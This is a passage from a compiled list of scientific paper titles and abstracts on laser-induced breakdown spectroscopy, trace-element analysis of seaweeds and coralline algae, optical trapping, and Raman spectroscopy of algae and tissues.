analysis of airborne particulates and solid samples A. J. R. Hunter and L. G. Piper. --- paper_title: Classification of vegetable oils based on their concentration of saturated fatty acids using laser induced breakdown spectroscopy (LIBS). paper_content: Spectrochemical analyses of organic liquid media such as vegetable oils and sweetened water were performed with the use of LIBS. The aim of this work is to study, on the basis of spectral analyses by LIBS technique of "Swan band" of C2 emitted by different vegetable oils in liquid phase, the characteristics of each organic media. Furthermore this paper proposes, as a classification, a single parameter that could be used to determine the concentration of saturated fatty acids of vegetable oils. A Nd:YAG operating at λ=532 nm and an energies per pulse of 30 mJ was focused onto the surface of the liquid in ambient air. Following ablation of vegetable oils and sweetened water, we find that vibrational bonds of C2 were released from the molecule containing carbon-carbon bonds linear. In the case of vegetable oils, we find a clear relationship between C2 emission from the plasma and the concentration of saturated fatty acids in the oil. --- paper_title: Laser-Induced Breakdown Spectroscopy of Liquids: Aqueous Solutions of Nickel and Chlorinated Hydrocarbons paper_content: Spectrochemical analyses of aqueous solutions containing nickel or the chlorinated hydrocarbons (CHCs) C2Cl4, CCl4, CHCl3, and C2HCl3 were performed with the use of laser-induced breakdown spectroscopy. A Nd:YAG laser operating at 60 mJ/pulse was focused onto the surface of the liquid. Elemental line intensities were monitored in the laser-produced plume as a function of analyte concentration to determine detection limits. The limits of detection for nickel in water were 36.4 +/- 5.4 mg/L and 18.0 +/- 3.8 mg/L for laser irradiation at 1.06 mu m and 355 nm, respectively. Ablation of pure CHCs at 355 nm produced extremely intense plasma emissions that primarily consisted of spectroscopic features attributed to CN, C3, H, N, and Cl. The spectra were structurally identical for all the CHCs except for differences in the intensities of various emission lines. With the use of emission from neutral atomic chlorine as an identifier for CHC contamination of water, no detectable traces of these elements were observed in saturated aqueous solutions. The detection limits for the CHCs were well above the saturation limits of CHC in water. --- paper_title: Quantitative molecular analysis with molecular bands emission using laser-induced breakdown spectroscopy and chemometrics paper_content: The present work describes the first quantitative molecular prediction using laser-induced molecular bands along with chemometrics. In addition, this spectroscopic procedure has demonstrated the first complete quantitative analysis utilizing traditionally insensitive elements for pharmaceutical formulations. Atomic LIBS requires certain sensitive elements, such as Cl, F, Br, S and P, in order to quantitate a specific organic compound in a complex matrix. Molecular LIBS has been demonstrated to be the first successful approach using atomic spectroscopy to evaluate a complex organic matrix. This procedure is also the first quantitative analysis using laser-induced molecular bands and chemometrics. We have successfully applied chemometrics to predict the formulation excipients and active pharmaceutical ingredient (API) in a complex pharmaceutical formulation. Using such an approach, we demonstrate that the accuracy for the API and a formulation lubricant, magnesium stearate, have less than 4% relative bias. The other formulation excipients such as Avicel® and lactose have been accurately predicted to have less than a 15% relative bias. Molecular LIBS and chemometrics have provided a novel approach for the quantitative analysis of several molecules that was not technically possible with the traditional atomic LIBS procedure, that required sensitive elements to be present in both API and formulation excipients. --- paper_title: Laser-induced breakdown spectroscopy of bacterial spores, molds, pollens, and protein: initial studies of discrimination potential paper_content: Laser-induced breakdown spectroscopy (LIBS) has been used to study bacterial spores, molds, pollens, and proteins. Biosamples were prepared and deposited onto porous silver substrates. LIBS data from the individual laser shots were analyzed by principal-components analysis and were found to contain adequate information to afford discrimination among the different biomaterials. Additional discrimination within the three bacilli studied appears feasible. --- paper_title: Detection of bacteria by time-resolved laser-induced breakdown spectroscopy. paper_content: A laser-induced breakdown spectroscopy technique for analyzing biological matter for the detection of biological hazards is investigated. Eight species were considered in our experiment: six bacteria and two pollens in pellet form. The experimental setup is described, then a cumulative intensity ratio is proposed as a quantitative criterion because of its linearity and reproducibility. Time-resolved laser-induced breakdown spectroscopy (TRELIBS) exhibits a good ability to differentiate among all these species, whatever the culture medium, the species or the strain. Thus we expect that TRELIBS will be a good candidate for a sensor of hazards either on surfaces or in ambient air. --- paper_title: Laser-Induced Breakdown Spectroscopy analysis of Bacteria: What Femtosecond Lasers Make Possible paper_content: Laser Induced Breakdown Spectroscopy spectra of bacteria, with nanosecond and femtosecond ablation, are compared. High sensitivity for mineral trace detections, larger intensity from molecular bands and precise kinetic study are among benefits using short pulses. --- paper_title: Elemental and radioactive analysis of commercially available seaweed. paper_content: Edible seaweed products have been used in many countries, specifically Japan, as a food item. Recently these products have become popular in the food industry because of a number of interesting medicinal properties that have been associated with certain edible marine algae. Very little control exists over the composition of these products, which could be contaminated with a number of agents including heavy metals and certain radioactive isotopes. Fifteen seaweed samples (six local samples from the coast of British Columbia, seven from Japan, one from Norway and one undisclosed) were obtained. All samples were analyzed for multiple elements, using ICP mass spectrometry and for radioactive constituents. It was found that six of eight imported seaweed products had concentrations of mercury orders of magnitude higher than the local products. Lead was found at somewhat higher concentrations in only one local product. Laminaria japonica had the highest level of iodine content followed by Laminaria setchellii from local sources. Only traces of cesium-137 were found in a product from Norway and radium-226 was found in a product from Japan. Arsenic levels were found to be elevated. In order to estimate the effect of these levels on health, one needs to address the bioavalability and the speciation of arsenic in these samples. --- paper_title: A general model for ontogenetic growth. paper_content: Several equations have been proposed to describe ontogenetic growth trajectories for organisms justified primarily on the goodness of fit rather than on any biological mechanism. Here, we derive a general quantitative model based on fundamental principles for the allocation of metabolic energy between maintenance of existing tissue and the production of new biomass. We thus predict the parameters governing growth curves from basic cellular properties and derive a single parameterless universal curve that describes the growth of many diverse species. The model provides the basis for deriving allometric relationships for growth rates and the timing of life history events. --- paper_title: High-resolution analysis of trace elements in crustose coralline algae from the North Atlantic and North Pacific by laser ablation ICP-MS paper_content: We have investigated the trace elemental composition in the skeleta of two specimens of attached-living ::: coralline algae of the species Clathromorphum compactum from the North Atlantic (Newfoundland) and ::: Clathromorphum nereostratum from the North Pacific/Bering Sea region (Amchitka Island, Aleutians). ::: Samples were analyzed using Laser Ablation-Inductively Coupled Plasma Mass Spectrometry (LA-ICP-MS) ::: yielding for the first time continuous individual trace elemental records of up to 69 years in length. The ::: resulting algal Mg/Ca, Sr/Ca, U/Ca, and Ba/Ca ratios are reproducible within individual sample specimens. ::: Algal Mg/Ca ratios were additionally validated by electron microprobe analyses (Amchitka sample). Algal Sr/ ::: Ca, U/Ca, and Ba/Ca ratios were compared to algal Mg/Ca ratios, which previously have been shown to ::: reliably record sea surface temperature (SST). Ratios of Sr/Ca from both Clathromorphum species show a ::: strong positive correlation to temperature-dependent Mg/Ca ratios, implying that seawater temperature ::: plays an important role in the incorporation of Sr into algal calcite. Linear Sr/Ca-SST regressions have ::: provided positive, but weaker relationships as compared to Mg/Ca-SST relationships. Both, algal Mg/Ca and ::: Sr/Ca display clear seasonal cycles. Inverse correlations were found between algal Mg/Ca and U/Ca, Ba/Ca, ::: and correlations to SST are weaker than between Mg/Ca, Sr/Ca and SST. This suggests that the incorporation ::: of U and Ba is influenced by other factors aside from temperature --- paper_title: Freshening of the Alaska Coastal Current recorded by coralline algal Ba/Ca ratios paper_content: Arctic Ocean freshening can exert a controlling influence on global climate, triggering ::: strong feedbacks on ocean‐atmospheric processes and affecting the global cycling of the ::: world’s oceans. Glacier‐fed ocean currents such as the Alaska Coastal Current are ::: important sources of freshwater for the Bering Sea shelf, and may also influence the Arctic ::: Ocean freshwater budget. Instrumental data indicate a multiyear freshening episode of ::: the Alaska Coastal Current in the early 21st century. It is uncertain whether this freshening ::: is part of natural multidecadal climate variability or a unique feature of anthropogenically ::: induced warming. In order to answer this, a better understanding of past variations in ::: the Alaska Coastal Current is needed. However, continuous long‐term high‐resolution ::: observations of the Alaska Coastal Current have only been available for the last 2 decades. ::: In this study, specimens of the long‐lived crustose coralline alga Clathromorphum ::: nereostratum were collected within the pathway of the Alaska Coastal Current and utilized ::: as archives of past temperature and salinity. Results indicate that coralline algal Mg/Ca ::: ratios provide a 60 year record of sea surface temperatures and track changes of the Pacific ::: Decadal Oscillation, a pattern of decadal‐to‐multidecadal ocean‐atmosphere climate ::: variability centered over the North Pacific. Algal Ba/Ca ratios (used as indicators of coastal ::: freshwater runoff) are inversely correlated to instrumentally measured Alaska Coastal ::: Current salinity and record the period of freshening from 2001 to 2006. Similar multiyear ::: freshening events are not evident in the earlier portion of the 60 year Ba/Ca record. ::: This suggests that the 21st century freshening of the Alaska Coastal Current is a unique ::: feature related to increasing glacial melt and precipitation on mainland Alaska. --- paper_title: High-resolution Mg/Ca ratios in a coralline red alga as a proxy for Bering Sea temperature variations from 1902 to 1967 paper_content: We present the first continuous, high-resolution record of Mg/Ca variations within an encrusting coralline red alga, Clathromorphum nereostratum, from Amchitka Island, Aleutian Islands. Mg/Ca ratios of individual growth increments were analyzed by measuring a singlepoint, electron-microprobe transect, yielding a resolution of ~15 samples/year and a 65-year record (1902–1967) of variations. Results show that Mg/Ca ratios in the high-Mg calcite algal framework display ::: pronounced annual cyclicity and archive late spring–late fall sea-surface temperatures (SST) corresponding to the main season of algal growth. Mg/Ca values correlate well to local SST, as well as to an air temperature record from the same region. High spatial correlation to large-scale SST variability in the subarctic North Pacific is observed, with patterns of strongest correlation following the direction of major oceanographic features that play a key role in the exchange of water masses between the North Pacific and the Bering Sea. Our data correlate well with a shorter Mg/Ca record from ability of the alga to reliably record regional environmental signals. In addition, Mg/Ca ratios relate well to a 29-year δ18O time series measured on the same sample, providing additional support for the use of Mg in coralline red algae as a paleotemperature proxy that, unlike algal-δ18O, is not influenced by salinity fluctuations. Moreover, electron microprobe–based analysis enables higher sampling resolution and faster analysis, thus providing a promising approach for future studies of longer C. nereostratum records and applications to other coralline species. --- paper_title: Development of a new sample pre-treatment procedure based on pressurized liquid extraction for the determination of metals in edible seaweed. paper_content: A new, simple, fast and automated method based on acetic acid-pressurized liquid extraction (PLE) has been developed for the simultaneous extraction of major and trace elements (As, Ca, Cd, Co, Cr, K, Mg, Mn, Na, Pb, Sr and Zn) from edible seaweeds. The target elements have been simultaneously determined by inductively coupled plasma-optical emission spectrometry (ICP-OES). The influence of several extraction parameters (e.g. acetic acid concentration, extraction temperature, extraction time, pressure, number of cycles, particle size and diatomaceous earth (DE) mass/sample mass ratio) on the efficiency of metal leaching has been evaluated. The results showed that metal extraction efficiency depends on the mass ratio of the dispersing agent mass and the sample. The optimized procedure consisted of the following conditions: acetic acid (0.75 M) as an extracting solution, 5 min of extraction time, one extraction cycle at room temperature at a pressure of 10.3 MPa and addition of a dispersing agent (at a ratio of 5:1 over the sample mass). The leaching procedure was completed after 7 min (5 min extraction time plus 1 min purge time plus 1 min end relief time). Limits of detection and quantification and repeatability of the over all procedure have been assessed. Method validation was performed analysing two seaweed reference materials (NIES-03 Chlorella Kessleri and NIES-09 Sargasso). The developed extraction method has been applied to red (Dulse and Nori), green (Sea Lettuce) and brown (Kombu, Wakame and Sea Spaghetti) edible seaweeds. --- paper_title: Coralline algal growth-increment widths archive North Atlantic climate variability paper_content: Over the past decade coralline algae have increasingly been used as archives of paleoclimate information. Encrusting coralline algae, which deposit annual growth increments in a high Mg-calcite skeleton, are amongst the longest-lived shallow marine organisms. In fact, a live-collected plant has recently been shown to have lived for at least 850 years based on radiometric dating. While a number of investigations have successfully used geochemical information of coralline algal skeletons to reconstruct sea surface temperatures, less attention has been paid to employ growth increment widths as a temperature proxy. Here we explore the relationship between growth and environmental parameters in Clathromorphum compactum collected in the subarctic Northwestern Atlantic. Results indicate that growth-increment widths of individual plants are poorly correlated with instrumental sea surface temperatures (SST). However, an averaged record of multiple growth increment-width time series from a regional network of C. compactum specimens up to 800 km apart reveals strong correlations with annual instrumental SST since 1950. Hence, similar to methods applied in dendrochronology, averaging of multiple sclerochronological records of coralline algae provides accurate climate information. A 115-year growth-increment width master chronology created from modern-collected and museum specimens is highly correlated to multidecadal variability seen in North Atlantic sea surface temperatures. Positive changes in algal growth anomalies record the well-documented regime shift and warming in the northwestern Atlantic during the 1990s. Large positive changes in algal growth anomalies were also present in the 1920s and 1930s, indicating that the impact of a concurrent large-scale regime shift throughout the North Atlantic was more strongly felt in the subarctic Northwestern Atlantic than previously thought, and may have even exceeded the 1990s event with respect to the magnitude of the warming. --- paper_title: Trace elements determination in edible seaweeds by an optimized and validated ICP-MS method paper_content: An optimized and validated inductively coupled plasma mass spectrometry (ICP-MS) method was used to analyze trace elements in seaweeds. Different volumes and rates of HNO3 and H2O2, digestion times, and microwave power levels were tested to ascertain the best conditions for sample digestion. Analytical mass and instrumental parameters were selected to assure accurate and precise determination of As, Cd, Co, Cr, Mo, Ni, Pb, Sb, Se, and V by ICP-MS. The method was optimized and validated using biological Certified Reference Materials. In addition, some samples of seaweeds (Porphyra and Laminaria) from France, Spain, Korea, and Japan were analyzed using the optimized method. Porphyra presented higher concentrations of most elements, except for As, than Laminaria. Seaweeds from Korea and Japan tended to display the highest concentrations of Pb and Cd. In contrast, Spanish and French samples showed the highest levels of some micro-elements essential to human nutrition. --- paper_title: Coralline algal Barium as indicator for 20th century northwestern North Atlantic surface ocean freshwater variability paper_content: During the past decades climate and freshwater dynamics in the northwestern North Atlantic have undergone major changes. Large-scale freshening episodes, related to polar freshwater pulses, have had a strong influence on ocean variability in this climatically important region. However, little is known about variability before 1950, mainly due to the lack of long-term high-resolution marine proxy archives. Here we present the first multidecadal-length records of annually resolved Ba/Ca variations from Northwest Atlantic coralline algae. We observe positive relationships between algal Ba/Ca ratios from two Newfoundland sites and salinity observations back to 1950. Both records capture episodical multi-year freshening events during the 20th century. Variability in algal Ba/Ca is sensitive to freshwater-induced changes in upper ocean stratification, which affect the transport of cold, Ba-enriched deep waters onto the shelf (highly stratified equals less Ba/Ca). Algal Ba/Ca ratios therefore may serve as a new resource for reconstructing past surface ocean freshwater changes. --- paper_title: Mineral composition of edible seaweed Porphyra vietnamensis paper_content: Abstract Edible seaweed Porphyra vietnamensis growing along seven different localities of the Central West Coast of India was analyzed for mineral composition (Na, K, Ca, Mg, B, Pb, Cr, Co, Fe, Zn, Mn, Hg, Cu, As, Ni, Cd and Mo) by inductively coupled plasma atomic emission spectroscopy (ICP-AES). The concentration ranges found for each sample, were as follows: Na, 24.5–65.6; K, 1.76–3.19, Ca, 1.40–6.12; Mg, 4.0–5.90 (mg/g d wt); Pb, 0.01–0.15; Cr, 0.13–0.22; Co, 0.06–0.20; Fe, 33.0–298; Zn, 0.93–3.27; Mn, 4.22–10.00; Hg, 0.01–0.04; Cu, 0.54–1.05; As, 1.24–1.83; Ni, 0.02–0.25; Cd, 0.14–0.55; Mo, 0.02–0.03 and B, 0.02–0.07 expressed in mg/100 g dry weight. Mineral composition of P. vietnamensis was found relatively higher as compared to the land vegetables as well as to other edible seaweeds, and it is in concurrence with the recent macrobiotic recommendation for western countries. It could therefore be used as food supplement as a spice to improve the nutritive value in the omnivorous diet. --- paper_title: Light at work: the use of optical forces for particle manipulation, sorting, and analysis. paper_content: We review the combinations of optical micro-manipulation with other techniques and their classical and emerging applications to non-contact optical separation and sorting of micro- and nanoparticle suspensions, compositional and structural analysis of specimens, and quantification of force interactions at the microscopic scale. The review aims at inspiring researchers, especially those working outside the optical micro-manipulation field, to find new and interesting applications of these methods. --- paper_title: Polarized Raman study of random copolymers of propylene with olefins paper_content: The polarized Raman spectroscopy is employed in the study of structural modifications in the films of isotactic polypropylene (PP) whose chain contains ethylene, 1-butene, 1-hexene, 1-octene, and 4-metyl-pentene-1, which represents an isomer of 1-hexene. It is demonstrated that the phase and conformational compositions of copolymer molecules depend on the comonomer content and the side-chain length of the second monomer. The content of the PP molecules in the helical conformation in the crystalline and amorphous phases of the copolymers monotonically decreases with increasing content of the second monomer. The decrease in the content of helical macromolecules in the crystalline phase is faster than the decrease in the amorphous phase. At a certain content of comonomers, the total content of the helical fragments decreases with increasing length of the side chain of the second monomer. The structures and Raman spectra of the copolymers of propylene with 1-hexene and 4-methyl-1-pentene are similar. --- paper_title: The potential of Raman spectroscopy for the identification of biofilm formation by Staphylococcus epidermidis paper_content: We report on an investigation into a common problem in microbiology laboratories, which is associated with the difficulty of distinguishing/recognising different strains of the genus Staphylococcus. We demonstrate the potential of Raman spectroscopy as a rapid techniques allowing for the identification of different isolates for the detection of biofilm-positive and biofilm-negative Staphylococcus epidermidis strains. For this, the recorded spectra were interpreted using the approach of principal component analysis (PCA). --- paper_title: In vivo Raman spectroscopy detects increased epidermal antioxidative potential with topically applied carotenoids paper_content: In the present study, the distribution of the carotenoids as a marker for the complete antioxidative potential in human skin was investigated before and after the topical application of carotenoids by in vivo Raman spectroscopy with an excitation wavelength of 785 nm. The carotenoid profile was assessed after a short term topical application in 4 healthy volunteers. In the untreated skin, the highest concentration of natural carotenoids was detected in different layers of the stratum corneum (SC) close to the skin surface. After topical application of carotenoids, an increase in the antioxidative potential in the skin could be observed. Topically applied carotenoids penetrate deep into the epidermis down to approximately 24 μm. This study supports the hypothesis that antioxidative substances are secreted via eccrine sweat glands and/or sebaceous glands to the skin surface. Subsequently they penetrate into the different layers of the SC. --- paper_title: The holographic optical micro-manipulation system based on counter-propagating beams paper_content: We present a system employing a dynamic diffrac- tive optical element to control properties of two counter- propagating beams overlapping within a sample chamber. This system allows us to eliminate optical aberrations along both beam pathways and arbitrarily switch between various num- bers of laser beams and their spatial profiles (i.e. Gaussian, Laguerre-Gaussian, Bessel beams, etc.). We successfully tested various counter-propagating dual-beam configurations includ- ing optical manipulation of both high and low index particles in water or air, particle delivery in an optical conveyor belt and the formation of colloidal solitons by optical binding. Furthermore, we realized a novel optical mixer created by particles spiraling in counter-propagating interfering optical vortices and a new tool for optical tomography or localized spectroscopy enabling sterile contactless rotation and reorientation of a trapped living cell. CP Bessel beams in a form of optical conveyor belt --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. Here we demonstrate the capacity of the spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Investigation of denaturation of human serum albumin under action of cethyltrimethylammonium bromide by raman spectroscopy paper_content: The mechanism of denaturation of human serum albumin (HSA) under action of a cationic detergent—cethyltrimethylammonium bromide (CTAB) is investigated by Raman spectroscopy method. The percentage contents of α-helical segments in polypeptide chain of HSA at denaturation under action of different concentrations of CTAB at different values of pH is determined. It is shown, that more intensive denaturation of HSA under action of CTAB takes place at pH values, larger the isoelectric point of protein (pI 4.7). --- paper_title: Monitoring of all hydrogen isotopologues at tritium laboratory Karlsruhe using Raman spectroscopy paper_content: We have recorded Raman spectra for all hydrogen isotopologues, using a CW Nd:YVO4 laser (5 W output power at 532 nm) and a high-throughput (f/1.8) spectrograph coupled to a Peltier-cooled (200 K) CCD-array detector (512 × 2048 pixels). A (static) gas cell was used in all measurements. We investigated (i) “pure” fillings of the homonuclear isotopologues H2, D2, and T2; (ii) equilibrated binary fillings of H2 + D2, H2 + T2, and D2 + T2, thus providing the heteronuclear isotopologues HD, HT, and DT in a controlled manner; and (iii) general mixtures containing all isotopologues at varying concentration levels. Cell fillings within the total pressure range 13–985 mbar were studied, in order to determine the dynamic range of the Raman system and the detection limits for all isotopologues. Spectra were recorded for an accumulation period of 1000 s. The preliminary data evaluation was based on simple peak-height analysis of the ro-vibrational Q1-branches, yielding 3σ measurement sensitivities of 5 × 10−3, 7 × 10−3, and 25 × 10−3 mbar for the tritium-containing isotopologues T2, DT, and HT, respectively. These three isotopologues are the relevant ones for the KATRIN experiment and in the ITER fusion fuel cycle. While the measurement reported here were carried out with static-gas fillings, the cells are also ready for use with flowing-gas samples. --- paper_title: Characterization of oil-producing microalgae using Raman spectroscopy paper_content: Raman spectroscopy offers a powerful alternative analytical method for the detection and identification of lipids/oil in biological samples, such as algae and fish. Recent research in the authors' groups, and experimental data only very recently published by us and a few other groups suggest that Raman spectroscopy can be exploited in instances where fast and accurate determination of the iodine value (associated with the degree of lipid unsaturation) is required. Here the current status of Raman spectroscopy applications on algae is reviewed, and particular attention is given to the efforts of identifying and selecting oil-rich algal strains for the potential mass production of commercial biofuels and for utilization in the food industry. --- paper_title: Optical trapping of microalgae at 735-1064 nm: photodamage assessment. paper_content: Living microalgal cells differ from other cells that are used as objects for optical micromanipulation, in that they have strong light absorption in the visible range, and by the fact that their reaction centers are susceptible to photodamage. We trapped cells of the microalga Trachydiscus minutus using optical tweezers with laser wavelengths in the range from 735 nm to 1064 nm. The exposure to high photon flux density caused photodamage that was strongly wavelength dependent. The photochemical activity before and after exposure was assessed using a pulse amplitude modulation (PAM) technique. The photochemical activity was significantly and irreversibly suppressed by a 30s exposure to incident radiation at 735, 785, and 835 nm at a power of 25 mW. Irradiance at 885, 935 and 1064 nm had negligible effect at the same power. At a wavelength 1064 nm, a trapping power up to 218 mW caused no observable photodamage. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Micro-Raman spectroscopy of algae: Composition analysis and fluorescence background behavior paper_content: Preliminary feasibility studies were performed using Stokes Raman scattering for compositional analysis of algae. Two algal species, Chlorella sorokiniana (UTEX #1230) and Neochloris oleoabundans (UTEX #1185), were chosen for this study. Both species were considered to be candidates for biofuel production. Raman signals due to storage lipids (specifically triglycerides) were clearly identified in the nitrogen-starved C. sorokiniana and N. oleoabundans, but not in their healthy counterparts. On the other hand, signals resulting from the carotenoids were found to be present in all of the samples. Composition mapping was conducted in which Raman spectra were acquired from a dense sequence of locations over a small region of interest. The spectra obtained for the mapping images were filtered for the wavelengths of characteristic peaks that correspond to components of interest (i.e., triglyceride or carotenoid). The locations of the components of interest could be identified by the high intensity areas in the composition maps. Finally, the time evolution of fluorescence background was observed while acquiring Raman signals from the algae. The time dependence of fluorescence background is characterized by a general power law decay interrupted by sudden high intensity fluorescence events. The decreasing trend is likely a result of photo-bleaching of cell pigments due to prolonged intense laser exposure, while the sudden high intensity fluorescence events are not understood. --- paper_title: Raman Spectroscopy and Related Techniques in Biomedicine paper_content: In this review we describe label-free optical spectroscopy techniques which are able to non-invasively measure the (bio)chemistry in biological systems. Raman spectroscopy uses visible or near-infrared light to measure a spectrum of vibrational bonds in seconds. Coherent anti-Stokes Raman (CARS) microscopy and stimulated Raman loss (SRL) microscopy are orders of magnitude more efficient than Raman spectroscopy, and are able to acquire high quality chemically-specific images in seconds. We discuss the benefits and limitations of all techniques, with particular emphasis on applications in biomedicine—both in vivo (using fiber endoscopes) and in vitro (in optical microscopes). --- paper_title: Review Raman based imaging in biological application- a perspective paper_content: Received 16 April 2012 Revised 08 June 2012 Accepted 19 July 2012 Early online 25 July 2012 Print 31 August 2012 Imaging by means of Raman spectroscopy has emerged as a powerful technique in the study of various chemical processes occurring in biology. This technique is non-invasive, label-free, capable of providing molecular identity and can be performed in robust conditions. However, one major drawback is its inherently weak signal. The ways to overcome this issue is to use Raman based methods e.g. Resonance Raman Spectroscopy (RRS), Surface Enhanced Raman Spectroscopy (SERS), Tip Enhanced Raman Spectroscopy (TERS). In this review, we gave a brief introduction of all these methods, with special emphasis on their recent advances and applications in various fields of life science. Corresponding author --- paper_title: A Resonance Raman Method for the Rapid Detection and Identification of Algae in Water paper_content: Resonance Raman spectra are reported for aqueous suspensions of nine clones of marine plankton algae representing three classes, five genera, and seven species. Spectra are obtained easily either directly from culture or from samples concentrated by sedimentation. Spectra taken at 488 or 457.9 nm are of high quality and are sufficiently distinct to differentiate clones at the algal class level, and possibly also at the genus level. Strongest peaks occur near 1527 and 1158 cm−1 associated with ν(c = c) and ν(c – c) of carotenoid pigments, but information is contained in the entire region between 900 and 3000 cm−1 due to associated overtone and combination bands which can be assigned along with fundamental vibrations. Chlorophyll peaks also are quite pronounced. Spectra obtained using rapid flow techniques match those taken using slurries in sealed tubes if low laser power is used. The sensitivity and rapidity of the technique suggest that it may be useful in remote sensing applications. --- paper_title: Raman microspectroscopy of algal lipid bodies: β-carotene quantification paper_content: Advanced optical instruments can serve for analysis and manipulation of individual living cells and their internal structures. We have used Raman microspectroscopic analysis for assessment of β-carotene concentration in algal lipid bodies (LBs) in vivo. Some algae contain β-carotene in high amounts in their LBs, including strains which are considered useful in biotechnology for lipid and pigment production. We have devised a simple method to measure the concentration of β-carotene in a mixture of algal storage lipids from the ratio of their Raman vibrations. This finding may allow fast acquisition of β-carotene concentration valuable, e.g., for Raman microspectroscopy assisted cell sorting for selection of the overproducing strains. Furthermore, we demonstrate that β-carotene concentration can be proportional to LB volume and light intensity during the cultivation. We combine optical manipulation and analysis on a microfluidic platform in order to achieve fast, effective, and non-invasive sorting based on the spectroscopic features of the individual living cells. The resultant apparatus could find its use in demanding biotechnological applications such as selection of rare natural mutants or artificially modified cells resulting from genetic manipulations. --- paper_title: Raman Spectroscopy Cell-based Biosensors paper_content: One of the main challenges faced by biodetection systems is the ability to detect and identify a large range of toxins at low concentrations and in short times. Cell-based biosensors rely on detecting changes in cell behaviour, metabolism, or induction of cell death following exposure of live cells to toxic agents. Raman spectroscopy is a powerful technique for studying cellular biochemistry. Different toxic chemicals have different effects on living cells and induce different time-dependent biochemical changes related to cell death mechanisms. Cellular changes start with membrane receptor signalling leading to cytoplasmic shrinkage and nuclear fragmentation. The potential advantage of Raman spectroscopy cell-based systems is that they are not engineered to respond specifically to a single toxic agent but are free to react to many biologically active compounds. Raman spectroscopy biosensors can also provide additional information from the time-dependent changes of cellular biochemistry. Since no cell labelling or staining is required, the specific time dependent biochemical changes in the living cells can be used for the identification and quantification of the toxic agents. Thus, detection of biochemical changes of cells by Raman spectroscopy could overcome the limitations of other biosensor techniques, with respect to detection and discrimination of a large range of toxic agents. Further developments of this technique may also include integration of cellular microarrays for high throughput in vitro toxicological testing of pharmaceuticals and in situ monitoring of the growth of engineered tissues. --- paper_title: Emerging concepts in deep Raman spectroscopy of biological tissue. paper_content: This article reviews emerging Raman techniques for deep, non-invasive characterisation of biological tissues. As generic analytical tools, the new methods pave the way for a host of new applications including non-invasive bone disease diagnosis, chemical characterisation of 'stone-like' materials in urology and cancer detection in a number of organs. --- paper_title: Raman Spectroscopy of Algae: A Review paper_content: Algae are eukaryotic microorganisms which contain chlorophyll and are capable of photosynthesis. In various studies, Raman spectra have been used to identify a particular genus in a group of different types of algae. Each biomolecule has its own signature Raman spectrum. This characteristic signal can be used to identify and characterize the biomolecules in algae. Raman spectrum can be used to identify the components, determine the molecular structure and various properties of biomolecules in algae. With this view, this work presents a comprehensive review of current practices and advancements in Raman spectroscopy of Algae as well as in Raman spectroscopy of component biomolecules of different genus of Algae. --- paper_title: Effects of pre-processing of Raman spectra onin vivo classification of nutrient status of microalgal cells paper_content: Raman spectra were obtained from cells of the chlorophyte unicellular eukaryotic alga Dunaliella tertiolecta, which had been grown either under nutrient-replete conditions or starved of nitrogen for 4 days. Spectra were rich in bands which could all be attributed to either chlorophyll a or β-carotene. A cursory examination of the differences between the spectra of replete and starved cells indicated a decline in chlorophyll a and an increase in β-carotene in chlorophytes. Unprocessed spectra showed pronounced baseline effects. A variety of pre-processing techniques were used in an attempt to visualise the spectral, and hence chemical, differences in the transformed data and perform classification based upon these differences. Six types of spectral pre-processing were compared: baseline correction with vector normalisation; Multiplicative Scatter Correction (MSC), Extended Multiplicative Signal Correction (EMSC); Standard Normal Variate (SNV); and vector normalised 1st and 2nd derivative spectra. Results for Soft Independent Modelling of Class Analogy (SIMCA) and Partial Least Squares (PLS) discriminant analysis were compared. All pre-processing methods allowed spectral differences between N-replete and N-starved spectra to be visualised, with derivatives and EMSC scoring the lowest RMSEC and RMSEV values with PLS and also the best overall classification results. SIMCA was not suited to classifying the nutrient classes under any of the pre-treatments, due to the small model distances involved. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. Here we demonstrate the capacity of the spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living 